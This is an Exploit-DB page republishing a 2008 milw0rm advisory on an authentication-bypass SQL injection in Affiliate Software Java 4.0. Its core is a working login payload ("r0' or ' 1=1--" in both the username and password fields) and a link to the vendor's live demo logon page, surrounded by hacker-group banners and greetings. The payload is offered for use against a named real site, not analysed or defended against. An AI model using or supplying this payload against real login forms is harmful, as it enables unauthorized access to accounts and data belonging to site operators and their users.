Affiliate Software Java 4.0 - Authentication Bypass

EDB-ID:

7423

CVE:

2008-6366

EDB Verified:

Author:

R3d-D3V!L

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2008-12-11

Vulnerable App:

[â˜¢] â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢{Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…}â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢

 [~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~] Vendor: www.adserversolutions.com
   
 [â˜ ] Software: Affiliate Software Java 4.0
   
 [â˜ ] author: ((Ñ3d D3v!L))
   
 [â˜ ] Date: 12.12.2008

 [â˜ ] Home: www.ahacker.biz
   
 [â˜ ] contact: N/A

[â˜ ]  â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ {DEV!L'5 of SYST3M}â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ 
   
 [â˜ ] Exploit:
   
 â˜  username: r0' or ' 1=1--
 â˜  password: r0' or ' 1=1--
   
   
 [â˜ ]login 4 d3m0:
   
  http://www.adserversolutions.com/affiliate_java/logon.jsp
 
 [~]-----------------------------{str0ke}---------------------------------------------------
 
  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\/\4/\/0/\/
  [~]
  [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2008-12-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services